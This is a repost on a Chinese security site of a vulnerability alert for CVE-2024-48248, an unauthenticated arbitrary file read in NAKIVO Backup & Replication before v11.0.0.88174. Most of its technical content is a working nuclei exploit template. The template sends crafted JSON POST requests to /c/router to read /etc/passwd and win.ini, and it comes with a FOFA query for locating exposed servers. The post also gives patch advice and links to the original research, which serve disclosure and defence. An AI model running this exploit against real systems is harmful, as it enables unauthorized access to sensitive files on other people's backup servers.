NAKIVO Backup & Replication任意文件读取漏洞(CVE-2024-48248) POC

admin 2025年2月27日23:31:48评论120 views字数 1892阅读6分18秒阅读模式

先关注,不迷路

简单的生活是幸福的关键,减少欲望和复杂性。 ——《纳瓦尔宝典》

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞介绍

NAKIVO Backup & Replication 是一款快速、经济实惠且一流的备份和灾难恢复解决方案,适用于 VMware vSphere、Microsoft Hyper-V、Nutanix AHV、Amazon EC2、Windows/Linux 和 Microsoft 365 环境。备份服务器可以安装在 Windows、Linux 和 NAS 操作系统上,尤其适合中小企业市场。NAKIVO Backup & Replication任意文件读取漏洞,攻击者可利用该漏洞获取系统敏感文件。

影响范围

NAKIVO Backup & Replication < v11.0.0.88174

漏洞编号

CVE-2024-48248

漏洞复现

NAKIVO Backup & Replication任意文件读取漏洞(CVE-2024-48248) POC
NAKIVO Backup & Replication任意文件读取漏洞(CVE-2024-48248) POC

漏洞分析

https://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248/

漏洞来源

https://github.com/watchtowrlabs/nakivo-arbitrary-file-read-poc-CVE-2024-48248/blob/main/README.md

nuclei脚本

id: nakivo-arbitrary-CVE-2024-48248-filereadinfo:  name: nakivo-arbitrary-CVE-2024-48248-fileread  author: PokerSec  severity: high  metadata:    fofa-search: app="NAKIVO-Backup-Replication"requests:  - raw:      - |-        POST /c/router HTTP/1.1        Host: {{Hostname}}        Connection: keep-alive        Content-type: application/json        {"action""STPreLoadManagement""data": ["/etc/passwd"], "method""getImageByPath""sid""""tid""watchTowr""type""watchTowr"}  - raw:      - |-        POST /c/router HTTP/1.1        Host: {{Hostname}}        Connection: keep-alive        Content-type: application/json        {"action""STPreLoadManagement""data": ["C:/windows/win.ini"], "method""getImageByPath""sid""""tid""watchTowr""type""watchTowr"}    stop-at-first-match: true    matchers-condition: and    matchers:      - type: word        part: body        words:          - '"type":"rpc"'          - 'STPreLoadManagement'          - '"data":['        condition: and      - type: status        status:          - 200    extractors:      - type: json         part: body        name: user        json:          - '.data.[]'

修复意见

目前官方已发布安全更新,建议用户尽快升级至最新版本:

https://www.nakivo.com/resources/download/trial-download/download/

如有侵权,请及时联系删除。

原文始发于微信公众号(PokerSec):【漏洞预警】NAKIVO Backup & Replication任意文件读取漏洞(CVE-2024-48248)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月27日23:31:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NAKIVO Backup & Replication任意文件读取漏洞(CVE-2024-48248) POChttps://cn-sec.com/archives/3777801.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息